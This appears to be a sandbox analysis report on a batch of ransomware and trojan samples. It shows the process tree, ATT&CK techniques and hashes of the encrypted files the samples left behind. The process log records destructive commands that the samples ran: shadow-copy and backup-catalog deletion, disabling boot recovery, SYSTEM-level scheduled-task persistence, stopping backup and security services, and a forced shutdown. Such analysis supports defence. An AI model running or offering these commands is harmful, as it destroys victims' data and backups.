C:\Users\Admin\Desktop\00440\Trojan.MSIL.Crypt.htyw-fcd90895e180463cdb1055387dc05515d7eb8c4df57a4f551cc0783f5a42ff28.exeTrojan.MSIL.Crypt.htyw-fcd90895e180463cdb1055387dc05515d7eb8c4df57a4f551cc0783f5a42ff28.exe3⤵PID:4772
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4772 -s 9404⤵
- Program crash
PID:5340
-
-
-
C:\Users\Admin\Desktop\00440\Trojan.MSIL.Crypt.htze-bec86f59eefe9181794efae31550650bc7633ec667c150220b14d556c03a7d25.exeTrojan.MSIL.Crypt.htze-bec86f59eefe9181794efae31550650bc7633ec667c150220b14d556c03a7d25.exe3⤵PID:15260
-
-
C:\Users\Admin\Desktop\00440\Trojan.MSIL.Crypt.hwnh-39747fe607b0e97a3e9e740f80c135032fea820e7f691acb4686886805ebeb0d.exeTrojan.MSIL.Crypt.hwnh-39747fe607b0e97a3e9e740f80c135032fea820e7f691acb4686886805ebeb0d.exe3⤵PID:5148
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5148 -s 9164⤵
- Program crash
PID:536
-
-
-
C:\Users\Admin\Desktop\00440\UDS-Trojan-Ransom.Win32.Encoder-0fcbc13b02572420da281d3013e14b3e9c9179787028cacd212839eb257fa6db.exeUDS-Trojan-Ransom.Win32.Encoder-0fcbc13b02572420da281d3013e14b3e9c9179787028cacd212839eb257fa6db.exe3⤵PID:10172
-
-
C:\Users\Admin\Desktop\00440\VHO-Trojan-Ransom.Win32.Blocker.gen-01e569565e27428cf91fe7f24853bdcaf10993d43ad78a946d32fcff06f586d7.exeVHO-Trojan-Ransom.Win32.Blocker.gen-01e569565e27428cf91fe7f24853bdcaf10993d43ad78a946d32fcff06f586d7.exe3⤵PID:8028
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "conhost" /sc ONLOGON /tr "'C:\PerfLogs\conhost.exe'" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:10068
-
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "conhost" /sc ONLOGON /tr "'C:\XK\conhost.exe'" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:7436
-
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "Trojan.MSIL.Crypt.htyw-fcd90895e180463cdb1055387dc05515d7eb8c4df57a4f551cc0783f5a42ff28" /sc ONLOGON /tr "'C:\Users\Admin\Desktop\00440\HEUR-Trojan-Ransom.MSIL.Blocker.gen-9440b5ca9e37624ce03a04238091c2390f11ebef50490f178a52e3170086e064\Trojan.MSIL.Crypt.htyw-fcd90895e180463cdb1055387dc05515d7eb8c4df57a4f551cc0783f5a42ff28.exe'" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:7900
-
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Defender\uk-UA\conhost.exe'" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:868
-
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "cmd" /sc ONLOGON /tr "'C:\Users\Public\Documents\My Music\cmd.exe'" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:12328
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Desktop\00440\nO1XDtCVgk.bat"4⤵PID:6536
-
-
-
C:\Users\Admin\Desktop\00440\VHO-Trojan-Ransom.Win32.Convagent.gen-52422d2b68bf17aeda4e6bdc724a97505b1639cf5729a0dfe07b0d3526a624b9.exeVHO-Trojan-Ransom.Win32.Convagent.gen-52422d2b68bf17aeda4e6bdc724a97505b1639cf5729a0dfe07b0d3526a624b9.exe3⤵PID:12184
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 12184 -s 3804⤵
- Program crash
PID:14548
-
-
-
C:\Users\Admin\Desktop\00440\VHO-Trojan-Ransom.Win32.Convagent.gen-a3bce66dd6349f293b4033aec4984e293560871d17a1c4e5c6baef89dd8ea336.exeVHO-Trojan-Ransom.Win32.Convagent.gen-a3bce66dd6349f293b4033aec4984e293560871d17a1c4e5c6baef89dd8ea336.exe3⤵PID:7684
-
-
C:\Users\Admin\Desktop\00440\VHO-Trojan-Ransom.Win32.Purga.gen-a43b765e32162dad5373f9dc42bf94c11f1a67c154c24623cdcceb78d9fd20b0.exeVHO-Trojan-Ransom.Win32.Purga.gen-a43b765e32162dad5373f9dc42bf94c11f1a67c154c24623cdcceb78d9fd20b0.exe3⤵PID:13904
-
C:\Users\Admin\Desktop\00440\VHO-Trojan-Ransom.Win32.Purga.gen-a43b765e32162dad5373f9dc42bf94c11f1a67c154c24623cdcceb78d9fd20b0.exe"C:\Users\Admin\Desktop\00440\VHO-Trojan-Ransom.Win32.Purga.gen-a43b765e32162dad5373f9dc42bf94c11f1a67c154c24623cdcceb78d9fd20b0.exe" runas4⤵
- Access Token Manipulation: Create Process with Token
PID:8720 -
C:\Users\Admin\AppData\Roaming\guide.exe"C:\Users\Admin\AppData\Roaming\guide.exe"5⤵PID:11220
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin Delete Shadows /All /Quiet6⤵PID:6504
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c bcdedit /set {default} recoveryenabled No6⤵PID:5916
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures6⤵PID:4508
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c start /max notepad.exe "C:\Users\Admin\Êàê ðàñøèôðîâàòü ôàéëû.TXT"6⤵PID:12464
-
C:\Windows\SysWOW64\notepad.exenotepad.exe "C:\Users\Admin\Êàê ðàñøèôðîâàòü ôàéëû.TXT"7⤵PID:6520
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\{A95CE6AF-1C66-8D96-ADB8-A429B067A2B5}.bat6⤵PID:13976
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\{9C5DB99F-2928-3CE9-D98A-BA9586DD75C7}.bat5⤵PID:8896
-
-
-
-
C:\Users\Admin\Desktop\00440\Win.Ransomware.Generic-6830619-0-93cbd25606ec9ca0c06eaa0e7efe4a6b06e9a762579cf282ef6f1fd5b1adf76b.exeWin.Ransomware.Generic-6830619-0-93cbd25606ec9ca0c06eaa0e7efe4a6b06e9a762579cf282ef6f1fd5b1adf76b.exe3⤵PID:9320
-
-
C:\Users\Admin\Desktop\00440\Win.Ransomware.Grandcrab-6732283-0-55819bace1428742e171f48644ef56558dfb2af302468fc5793d475d73ce055d.exeWin.Ransomware.Grandcrab-6732283-0-55819bace1428742e171f48644ef56558dfb2af302468fc5793d475d73ce055d.exe3⤵PID:8256
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8256 -s 5124⤵
- Program crash
PID:13652
-
-
-
C:\Users\Admin\Desktop\00440\Win.Ransomware.Protected-9838686-0-f2576cc920a56422a1f121ecddcd5af71ccba277efeb2131ab647d9c8c152372.exeWin.Ransomware.Protected-9838686-0-f2576cc920a56422a1f121ecddcd5af71ccba277efeb2131ab647d9c8c152372.exe3⤵PID:13984
-
-
C:\Users\Admin\Desktop\00440\Win.Ransomware.Stupid-9871677-0-5f5ce02b10d6294b7a74f0a9b82d4244809ac85eafcde474a4749272a0afc40d.exeWin.Ransomware.Stupid-9871677-0-5f5ce02b10d6294b7a74f0a9b82d4244809ac85eafcde474a4749272a0afc40d.exe3⤵PID:15196
-
-
C:\Users\Admin\Desktop\00440\Win.Ransomware.Wanna-9769986-0-a42d5baa3b1eb67cefcbf9a7bdb2a0f86c5ff83b3763714c3d9eef15a71149ec.exeWin.Ransomware.Wanna-9769986-0-a42d5baa3b1eb67cefcbf9a7bdb2a0f86c5ff83b3763714c3d9eef15a71149ec.exe3⤵PID:2008
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 4872 -ip 48721⤵PID:5056
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 4432 -ip 44321⤵PID:416
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:5892
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵PID:4556
-
C:\Windows\system32\wbem\wmic.exewmic SHADOWCOPY DELETE /nointeractive1⤵
- Process spawned unexpected child process
PID:6316
-
C:\Windows\system32\wbem\wmic.exewmic SHADOWCOPY DELETE /nointeractive1⤵
- Process spawned unexpected child process
PID:6300
-
C:\Windows\system32\wbem\wmic.exewmic SHADOWCOPY DELETE /nointeractive1⤵
- Process spawned unexpected child process
PID:6264
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x44c 0x4641⤵PID:6188
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:7888
-
C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe"C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe"1⤵PID:6388
-
C:\Users\Admin\Desktop\00440\HEUR-Trojan-Ransom.Win32.Generic-edf9912bf2c8c7d9048bc6322900231810de7cc34267acc12e1a256fbecdbbdf.exeC:\Users\Admin\Desktop\00440\HEUR-Trojan-Ransom.Win32.Generic-edf9912bf2c8c7d9048bc6322900231810de7cc34267acc12e1a256fbecdbbdf.exe1⤵PID:4844
-
\??\c:\windows\system32\cmd.exe"c:\windows\system32\cmd.exe" /c c:\windows\logg.bat2⤵PID:5296
-
-
\??\c:\Windows\system32\vssadmin.exe"c:\Windows\system32\vssadmin.exe" Delete Shadows /All /Quiet2⤵
- Interacts with shadow copies
PID:6688
-
-
\??\c:\windows\system32\sc.exe"c:\windows\system32\sc.exe" delete defragsrv2⤵
- Launches sc.exe
PID:14372
-
-
\??\c:\Windows\system32\vssadmin.exe"c:\Windows\system32\vssadmin.exe" Delete Shadows /All /Quiet2⤵
- Interacts with shadow copies
PID:9584
-
-
\??\c:\windows\system32\wbadmin.exe"c:\windows\system32\wbadmin.exe" delete catalog -quiet2⤵
- Deletes backup catalog
PID:6252
-
-
\??\c:\Windows\System32\wbem\WMIC.exe"c:\Windows\System32\wbem\WMIC.exe" shadowcopy delete2⤵PID:5356
-
-
\??\c:\windows\system32\mshta.exe"c:\windows\system32\mshta.exe" "c:\teslarvng2.hta"2⤵PID:13384
-
-
\??\c:\windows\system32\cmd.exe"c:\windows\system32\cmd.exe" /c c:\windows\logg.bat2⤵PID:11128
-
-
\??\c:\windows\system32\cmd.exe"c:\windows\system32\cmd.exe" /c SCHTASKS /create /tn logg /sc MINUTE /mo 10 /tr "c:\windows\logg.bat" /ru "NT AUTHORITY\SYSTEM"&&SCHTASKS /run /tn logg2⤵PID:11384
-
C:\Windows\system32\schtasks.exeSCHTASKS /create /tn logg /sc MINUTE /mo 10 /tr "c:\windows\logg.bat" /ru "NT AUTHORITY\SYSTEM"3⤵
- Scheduled Task/Job: Scheduled Task
PID:13388
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /run /tn logg3⤵PID:7712
-
-
-
\??\c:\windows\system32\cmd.exe"c:\windows\system32\cmd.exe" /c "C:\Windows\TEMP\wait.bat"2⤵PID:13992
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:5200
-
-
C:\Windows\system32\find.exefind /i "SDELETE.exe"3⤵PID:9732
-
-
C:\Windows\system32\shutdown.exeshutdown /p /f3⤵PID:10544
-
-
-
\??\c:\windows\system32\cmd.exe"c:\windows\system32\cmd.exe" /c ping 127.0.0.1 -w 1000 -n 30 & del /Q /F "C:\Users\Admin\Desktop\00440\HEUR-Trojan-Ransom.Win32.Generic-edf9912bf2c8c7d9048bc6322900231810de7cc34267acc12e1a256fbecdbbdf.exe"2⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:12924 -
C:\Windows\system32\PING.EXEping 127.0.0.1 -w 1000 -n 303⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:14768
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\HEUR-Trojan-Ransom.Win32.Generic-f50ba2fd7e441ef2bffeb6355d33f367248097351d0fa42932c59c6dd26557b5.exeC:\Users\Admin\AppData\Roaming\Microsoft\Windows\HEUR-Trojan-Ransom.Win32.Generic-f50ba2fd7e441ef2bffeb6355d33f367248097351d0fa42932c59c6dd26557b5.exe1⤵PID:9356
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 2528 -ip 25281⤵PID:12940
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:1568
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵PID:11876
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:10124
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:9344
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 14968 -ip 149681⤵PID:1164
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 14616 -ip 146161⤵PID:13356
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 14616 -ip 146161⤵PID:8028
-
C:\Windows\SYSTEM32\cmd.exeC:\Windows\SYSTEM32\cmd.exe /c "c:\windows\logg.bat"1⤵PID:9608
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 5148 -ip 51481⤵PID:5060
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 12184 -ip 121841⤵PID:10816
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 4772 -ip 47721⤵PID:8792
-
C:\Users\Admin\AppData\Local\d821e19d-49b5-44ce-ae2b-8585486cebe6\HEUR-Trojan-Ransom.Win32.Stop.gen-16100415ba4415eb4ebcc61c47931181d6b331645047a1733b7daec6ef0c9498.exeC:\Users\Admin\AppData\Local\d821e19d-49b5-44ce-ae2b-8585486cebe6\HEUR-Trojan-Ransom.Win32.Stop.gen-16100415ba4415eb4ebcc61c47931181d6b331645047a1733b7daec6ef0c9498.exe --Task1⤵PID:7200
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 8256 -ip 82561⤵PID:9460
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 10616 -ip 106161⤵PID:10692
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BMR Boot Service /y1⤵PID:8552
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SavRoam /y1⤵PID:12036
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop QBFCService /y1⤵PID:6496
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop QBCFMonitorService /y1⤵PID:1344
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y1⤵PID:13064
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop DefWatch /y1⤵PID:9868
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y1⤵PID:14692
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccEvtMgr /y1⤵PID:13228
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop YooIT /y1⤵PID:9824
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop YooBackup /y1⤵PID:3172
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop zhudongfangyu /y1⤵PID:1708
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamNFSSvc /y1⤵PID:10028
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VSNAPVSS /y1⤵PID:13280
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc /y1⤵PID:8688
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamDeploymentService /y1⤵PID:7284
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop stc_raw_agent /y1⤵PID:11288
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x4 /state0:0xa3ce3855 /state1:0x41c64e6d1⤵PID:14144
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
3PowerShell
1Scheduled Task/Job
1Scheduled Task
1System Services
3Service Execution
3Windows Management Instrumentation
1Persistence
Create or Modify System Process
4Windows Service
4Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Access Token Manipulation
1Create Process with Token
1Create or Modify System Process
4Windows Service
4Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Access Token Manipulation
1Create Process with Token
1Direct Volume Access
1File and Directory Permissions Modification
1Impair Defenses
2Disable or Modify System Firewall
1Indicator Removal
4Clear Windows Event Logs
1File Deletion
3Modify Registry
1Discovery
Network Service Discovery
1Peripheral Device Discovery
1Process Discovery
1Query Registry
1Remote System Discovery
1System Information Discovery
1System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
1Internet Connection Discovery
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
129B
MD5a526b9e7c716b3489d8cc062fbce4005
SHA12df502a944ff721241be20a9e449d2acd07e0312
SHA256e1b9ce9b57957b1a0607a72a057d6b7a9b34ea60f3f8aa8f38a3af979bd23066
SHA512d83d4c656c96c3d1809ad06ce78fa09a77781461c99109e4b81d1a186fc533a7e72d65a4cb7edf689eeccda8f687a13d3276f1111a1e72f7c3cd92a49bce0f88
-
Filesize
446B
MD5528f57214810ad51aa26b039f81bd0ea
SHA192c283fab2a1e03f21f418813bc46dd63d305058
SHA2564024b13a1d6ba1687ab6223195ba001567b0cc87a2c88799287f3382e2a21fd6
SHA512dbf7a9d26aafa0562c928f282c7c25336ddfed13b3fc872550df8feaf2f567eac6db4c48792b3404b265db0dccb8275ea18517a0b191759737b6f22feb87c612
-
C:\Program Files (x86)\Common Files\Microsoft Shared\ink\de-DE\id[fF0yoY63].[[email protected]].InkObj.dll.mui.teslarvng2
Filesize5KB
MD53d02ce2cb01a6affc60aa095bca2d973
SHA15148497d0b14e7b6f93a4fdb9a8e615d85546244
SHA256c53cda2d42f0eb58a375ffc0025fb61171870068f7e6a4e031f132fa8ed08b92
SHA512d10f91e91815af1be25238b6e535287e24cd8ff3d4a7b95518d6b45d436cd1315a53e5c8820c947eb506111645a1628fc2bdbdb80fb741e6ac0a84022ec96b42
-
C:\Program Files (x86)\Common Files\Microsoft Shared\ink\de-DE\id[fF0yoY63].[[email protected]].TipRes.dll.mui.teslarvng2
Filesize27KB
MD5ab28af4b1f900163eb8bbdbd7dd98b43
SHA17d375b4c06f6842323d4c62d94aa26a2b8519d38
SHA256b5dfed18968a38518ec9d07a0c0dff314209703a59120fe061eb46297da2f789
SHA51296242ab429af653697a787869f9fc2764d54ce2a67e7dd8524404e20f2186ddd768ab793a2a8dceb6da06cd28166a08a0a7612aa65ad4960754ee52b595933db
-
C:\Program Files (x86)\Common Files\Microsoft Shared\ink\de-DE\id[fF0yoY63].[[email protected]].TipTsf.dll.mui.teslarvng2
Filesize3KB
MD5d0e6bee1a5199076420bb297d129b5a0
SHA1bb0f8498b53813705f6015ca7db392ed5b6c4cbb
SHA2566cb9327c2cc07bd703f517094dee1c7fef8d6211895e4cc2ce5068dce18cd3c6
SHA51265ba6b73181e719450970cb77ab536c8555e1f4ba9480cb27521f27d3133354f81185deab2c742a0ada49234d47ec0896136143eb47eef420ab391444da52819
-
C:\Program Files (x86)\Common Files\Microsoft Shared\ink\de-DE\id[fF0yoY63].[[email protected]].rtscom.dll.mui.teslarvng2
Filesize3KB
MD52f3926339caeb40c172c1b4be16e879f
SHA1d9ec58dc07ac11bc8b7b25def1ba6706501033db
SHA256875c1c5270ee8b75733d0a8b37b8fb00229a3ab32fe9832cd11a0980e17265cf
SHA512456f2710d39b6f1c471d4ec0f5309aae0446b1f3d6e24b78e89a635ee5c0b52e579ddcc907e04c6de3e88ad264f48cd17be050386bdc9431defffa8aa1b53379
-
C:\Program Files (x86)\Common Files\Microsoft Shared\ink\en-US\id[fF0yoY63].[[email protected]].InkObj.dll.mui.teslarvng2
Filesize5KB
MD517b8bac36c358d6f4bb8b0d62d072b42
SHA1249fd88a71cadad3992a0cc5e836c714676e0c42
SHA2566962d2c4195a2d7fd9419b03dc2f016ba8222e6f8400d011631e8f49e1395b0f
SHA51271cf68b0e47c92a9d061241a50feced9d5531d6d05e40e3c201a42b03e138e3a9e907a910860fcaf4c4e8b9b7a66e9db149ef781fd9e7f90c1740c26fc01a8ea
-
C:\Program Files (x86)\Common Files\Microsoft Shared\ink\en-US\id[fF0yoY63].[[email protected]].TipRes.dll.mui.teslarvng2
Filesize24KB
MD52c911fc5e3a85f3e7a831d1b0938193f
SHA12d9c1674f8cb03a93e5e450e4891831cf1d37dca
SHA256e2c8c4c4a7f964a4bb877b4e58d05c05ece83f5980ebc559963c204eaf2b641e
SHA5124fab60f864e01059f3cbad1cc94a07720d7a112131be093ae6423c3e7ddc417f71a1bcd12edc64a877ec1fae3aa43a387ee76f269fe01b2305e98daa105fa158
-
C:\Program Files (x86)\Common Files\Microsoft Shared\ink\en-US\id[fF0yoY63].[[email protected]].TipTsf.dll.mui.teslarvng2
Filesize3KB
MD59f5413f48ea1bc4d9e1113e6da50d543
SHA10873164147626b8155969731d6bafbd9498238b7
SHA256a70a3c3d03393578269f04fa082b7796b38fd682e975146bff3d70e0b35b3023
SHA51212fab1fc69a0559c5fe9a94fdb5b54656e8a3090d6b2edb203da81bc4c82749c1f10473b1fe733cc783c5b39c163d29e105e13879d747c542770804b2ce25106
-
C:\Program Files (x86)\Common Files\Microsoft Shared\ink\en-US\id[fF0yoY63].[[email protected]].micaut.dll.mui.teslarvng2
Filesize9KB
MD5a7268302aa412bdd883a2d5f482df18d
SHA1f83012735d6a5555b5de607c9803df557fc69cf0
SHA256a36d0098cb323d65e21eda5e6ffdc3556f1c0a8d960f76dece0b47e12a76a3f7
SHA5128a24d5859d8f859ddd20e8dec9eb75c2ff79cfd0e8173153381b7997cd5f682e866647c2b7b68c3a97efbb51b603fe8a51c69b706c60c517730f88661c6ea3a5
-
C:\Program Files (x86)\Common Files\Microsoft Shared\ink\en-US\id[fF0yoY63].[[email protected]].rtscom.dll.mui.teslarvng2
Filesize3KB
MD5faf03f1c176320b3ef9be24d6fba207b
SHA12f7ec0d0d2a7133293534e517ef056502bfe2ddb
SHA256075fe823425a9180d3899efda0a6ea2b74ce48ef7393c4bae51829b85ac377a5
SHA5120682e8989c432239b123bf0a387518bda9d2e4eb3f214d3f41720146383e82a880d4c91bfd57bfc3d1ba908517765fdf8af54a4d0ffca3dbdbfd966ae656c4da
-
C:\Program Files (x86)\Common Files\Microsoft Shared\ink\es-ES\id[fF0yoY63].[[email protected]].InkObj.dll.mui.teslarvng2
Filesize5KB
MD54888078d7acd6fbc67b49bd82a0c0c9d
SHA1ba03b1e58d9862480806b44be2c760b476f73e95
SHA2563da3fe222226dd7735b902437b22dbe51daf0166933d3b44e0ef32b38429c467
SHA512bc80f21d3033a1b4961c33fdab56b7e7aa3516ac4fb4a5b60b9e1f9862f48bd9257cf5d6c0e5ba3d1e9e0b2b6d4aec80a763913194c6b9c2bab64d0985b0fdb8
-
C:\Program Files (x86)\Common Files\Microsoft Shared\ink\es-ES\id[fF0yoY63].[[email protected]].TipRes.dll.mui.teslarvng2
Filesize27KB
MD5d2880e0360a90bb4c3f87d9c6195212f
SHA19276d1959df6c684e4d25bce6e077e099e9d55ee
SHA256ace70f06c0124fa5e5dee2d718cc7fde25853f4b37850eb578cc554060befda1
SHA512337a524b9e0dbd4992c95219877ed61f2a026928aa87aa7a07ee26279422f70d29f992aeb2a32f0e7950f6b63432dfa71cd6e00c7331ed60f5481cbf489f7e40
-
C:\Program Files (x86)\Common Files\Microsoft Shared\ink\es-ES\id[fF0yoY63].[[email protected]].TipTsf.dll.mui.teslarvng2
Filesize3KB
MD52feb4af8d88b83c97fa1adeca121b8af
SHA1660f9a58256958b0f785d28aa0d03597f447a6b5
SHA256e25bb29b26d7774cd701fd64af9b6006f4f7c37801f15805b2e52407caac9941
SHA512e74fac3d4e5d302c6cbdd893da655ab08a9f9eaeeae16b51c8629090bc3b0a8ea2b9dc7da5f0e4d6e35917eae32eac7ae3544fe5dc2d00d689d2c50c0d676722
-
C:\Program Files (x86)\Common Files\Microsoft Shared\ink\es-ES\id[fF0yoY63].[[email protected]].rtscom.dll.mui.teslarvng2
Filesize3KB
MD584e9f8370494f3f04d5de27474bf3a1e
SHA1811853533688475ff5904bcd5eeb2218534ab5b0
SHA25691ea048b7ef5884cd611c3d8f0608f5d0e2999c0c25068edd032d21833a24fe8
SHA5121a2f3e8292f7f2e35a9036e4ab38fd4c3a2ede2b377ec3a5c98f20af796056189db3430d770b7209630db02d29d005ee520d42b2cee232ab5f0976f34970d65b
-
C:\Program Files (x86)\Common Files\Microsoft Shared\ink\fr-FR\id[fF0yoY63].[[email protected]].InkObj.dll.mui.teslarvng2
Filesize5KB
MD5be340a6b61bf2c8cf6b8f99accf93b1f
SHA1eeed6d0d4d1df01cb0246680c260a80e4eb92b83
SHA256398bb1132c60c5f1df451a80531b3f4f9aca7103f1222c4140c97002e3119727
SHA512c1663a499991bb0c2c1de8c9c484b6c539d7fc6e7fd06af961427ddcdc188e88f10559f1f46f232ed34b55c96c496e35816be72d7ea72bfddb7f8eccc0370e6c
-
C:\Program Files (x86)\Common Files\Microsoft Shared\ink\fr-FR\id[fF0yoY63].[[email protected]].TipRes.dll.mui.teslarvng2
Filesize27KB
MD5d9526684b4e54880a1dd6b7a3ed2f0ba
SHA1e444d28fc79ed6fa9cf5e3fbd2238c0839cb83ec
SHA256ecd6d781bda7496b7f9cec614a89db0b7da838819a283266ed850007fbd1689b
SHA5129427f4f0e68c4a392c86f66267eaed25a204b1bbaec20ba2defdfe8a167e5308edebe055e41cf24a1b9334dad54b92521a768239ddaad535416db18ac22362a5
-
C:\Program Files (x86)\Common Files\Microsoft Shared\ink\fr-FR\id[fF0yoY63].[[email protected]].TipTsf.dll.mui.teslarvng2
Filesize3KB
MD5a6fb40a472699f441f92dfebffa74140
SHA19563428274ce7e7844397aa3eb996e3b47f2bc26
SHA2560744de3442d4c6bdaa4d8e8aa128f0757aea1333df7133ebe7230f1fbd09d7e8
SHA51289b75b293ecb976e9c8f6310186d74cf9a3218b4d77df2f18470611d12a901570d44b6a27097a39c7f5d12059fa97a76acedacf60a2c6096cb240730d9b28a9f
-
C:\Program Files (x86)\Common Files\Microsoft Shared\ink\fr-FR\id[fF0yoY63].[[email protected]].rtscom.dll.mui.teslarvng2
Filesize3KB
MD59c9e5d4cc50b8a2b0ed9e5a2cc9db69b
SHA1fef527c65b766b3bcd3eb95ceda0dc18249cce66
SHA256f8b7cc1abbb5b5b263742563c7354713646308029b83dc8ac0f9e6ea02dc2c61
SHA5122d8ee2aab910c2a7e133d10b727a6745146a28fdb08162ebeb3e1069b114a52bdc374771365874d496d9660ac17d19534feba41787ac2cd5dae0c6ed944c6350
-
C:\Program Files (x86)\Common Files\Microsoft Shared\ink\it-IT\id[fF0yoY63].[[email protected]].InkObj.dll.mui.teslarvng2
Filesize5KB
MD5b50f414eaf26f50f6c7d3771638b0fec
SHA198ed4090a395f27dc6ab56fe2df807a2c83bd259
SHA25685926f671aeb3d02c12f2c40c8b428531b7536275458cf1535e20b317e7fa9e1
SHA5120aa4a290d62f8b81fff1ffa908998bf4753576760a28059b468882a6fc2b8a05ef189a1ad2b540574c66707b3ec2c3491b1ff75da6f42c6d3e9ce29bc4a1f1bd
-
C:\Program Files (x86)\Common Files\Microsoft Shared\ink\it-IT\id[fF0yoY63].[[email protected]].TipRes.dll.mui.teslarvng2
Filesize27KB
MD598c64a9b29e745fb164f377f775dd71f
SHA15df826bc856eb8fc270af8fce09fad095e1b78b4
SHA256e8c883c8acceb083364eafbee1cc4f64e92612968849290229d582ce0596e04d
SHA5125e5f8cb00f4645de14b9b74b7df267643db1f3d464dbcdc0fc4b65dd8ff41a1ce4135e7b6886d4fed4fb184710f1d7db8a71f0096960902ea754ca9312593532
-
C:\Program Files (x86)\Common Files\Microsoft Shared\ink\it-IT\id[fF0yoY63].[[email protected]].TipTsf.dll.mui.teslarvng2
Filesize3KB
MD5c30241ad627d51ad43b9192a92455a6f
SHA1a6e76b09646d9057df5176411fdd0410988d0e97
SHA25610728763f9e2faec752f7af1da27bc0f85ceaa3e80d199503420e0618e0eb80c
